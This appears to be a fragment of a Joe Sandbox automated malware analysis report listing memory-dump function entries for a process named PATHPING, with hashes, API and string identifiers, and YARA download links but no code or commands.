                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2ca0000_PATHPING.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __aulldvrm
                                                                                                                                • String ID: +$-
                                                                                                                                • API String ID: 1302938615-2137968064
                                                                                                                                • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                • Instruction ID: 321fa4105357d226b28686db8b8802603d1c575de29bd759a205eaa06dd5172a
                                                                                                                                • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                • Instruction Fuzzy Hash: 32917371E4021AAAFB24DE69E8806BFF7A5EF44724F24451AE855E7BE0D730DD40CB60
                                                                                                                                Function 02CD9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2ca0000_PATHPING.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $$@
                                                                                                                                • API String ID: 0-1194432280
                                                                                                                                • Opcode ID: c9df2c0e07a2356f82473d2d7fcc93d905c1e7c7a71bdbfaac9b9274d930ec23
                                                                                                                                • Instruction ID: 9d4d3a2389808097d1db48a0105ea06dd2228e1fb27afe482e612c401f49b423
                                                                                                                                • Opcode Fuzzy Hash: c9df2c0e07a2356f82473d2d7fcc93d905c1e7c7a71bdbfaac9b9274d930ec23
                                                                                                                                • Instruction Fuzzy Hash: B5812B76D002699BDB31CB54CC49BEEB7B8AF48714F1041EAEA09B7250D7709E84CFA0